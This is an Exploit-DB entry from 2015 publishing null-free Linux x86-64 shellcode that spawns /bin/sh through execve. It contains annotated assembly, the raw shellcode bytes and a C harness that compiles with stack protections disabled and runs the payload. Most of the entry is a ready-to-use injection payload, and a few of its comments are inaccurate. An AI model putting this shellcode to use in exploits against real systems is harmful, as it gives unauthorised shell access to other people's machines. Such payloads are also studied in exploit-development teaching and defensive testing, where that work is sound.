Linux/x64 - execve(/bin/sh) + Null-Free Shellcode (30 bytes)

EDB-ID:

37362

CVE:

N/A




Platform:

Linux_x86-64

Date:

2015-06-24


/*
William Borskey 2015
Compile with: gcc -fno-stack-protector -z execstack Shellcode written in 64 bit Intel assembly using yasm.

  1 ; int execve(const char *filename, char *const argv[], char *const envp[]);
  2 BITS 64
  3 
  4 section .text
  5         global start
  6 
  7 start:
  8         mov rcx, 0x1168732f6e69622f ;move the immediate value /bin/sh in hex in 
  9                                     ;little endian byte order into rcx padded with 11
 10         shl rcx, 0x08               ;left shift to trim off the two bytes of padding    
 11         shr rcx, 0x08               ;ringht shift to re order string
 12         push rcx                    ;push the immediate value stored in rcx onto the stack
 13         lea rdi, [rsp]              ;load the address of the string that is on the stack into rsi
 14         xor rdx, rdx                ;zero out rdx for an execve argument
 15         mov al, 0x3b                ;move 0x3b (execve sycall) into al to avoid nulls
 16         syscall                     ;make the syscall
*/

char shellcode[] = "\x48\xb9\x2f\x62\x69\x6e\x2f\x73\x68\x11\x48\xc1\xe1\x08\x48\xc1\xe9\x08\x51\x48\x8d\x3c\x24\x48\x31\xd2\xb0\x3b\x0f\x05";

int main(int argc, char **argv)
{
    int (*func)();
    func = (int (*)()) shellcode;
    (int)(*func)();
     return 0;
}